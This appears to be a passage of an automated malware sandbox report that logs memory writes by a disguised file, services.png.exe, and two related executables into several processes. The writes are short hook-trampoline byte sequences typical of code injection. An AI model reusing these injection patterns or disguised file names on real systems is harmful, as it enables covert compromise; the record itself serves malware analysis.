                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 75C0B390 value: 68 95 EE C9 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 75C0B400 value: 68 C7 EE C9 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 75BF7D00 value: 68 01 EF C9 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 75509390 value: 68 FE CD CB 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 74D8FF10 value: 68 B0 B4 CB 02 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5728 base: 74D6A810 value: 68 20 B5 CB 02 C3
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 5D0000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 5D0011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A0010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A0046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A0052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A0060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A0098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A00A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A00B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A00C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A00D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A00DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A00EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A00FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A0119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A0129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A0137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A0145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A0151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A0179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3 Jump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: PID: 6516 base: 29A0187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3 Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: PID: 1460 base: 600000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3 Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: PID: 1460 base: 600011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3 Jump to behavior
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C60010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C6003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C60046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C60052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C60060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C6006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C6007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C6008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C60098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C600A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C600B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C600C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C600D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C600DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C600EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C600FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C6010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C60119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C60129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C60137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C60145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C60151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C6015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C6016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C60179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C60187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C70000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5012 base: 2C70011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED0010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED0046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED0052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED0060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED0098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED00A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED00B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED00C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED00D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED00DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED00EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED00FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED0119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED0129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED0137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED0145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED0151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED0179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2ED0187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2EE0000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4908 base: 2EE0011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2300010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 230003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2300046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2300052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2300060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 230006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 230007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 230008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2300098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 23000A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 23000B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 23000C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 23000D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 23000DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 23000EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 23000FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 230010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2300119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2300129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2300137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2300145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2300151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 230015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 230016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2300179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2300187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2310000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 3804 base: 2310011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
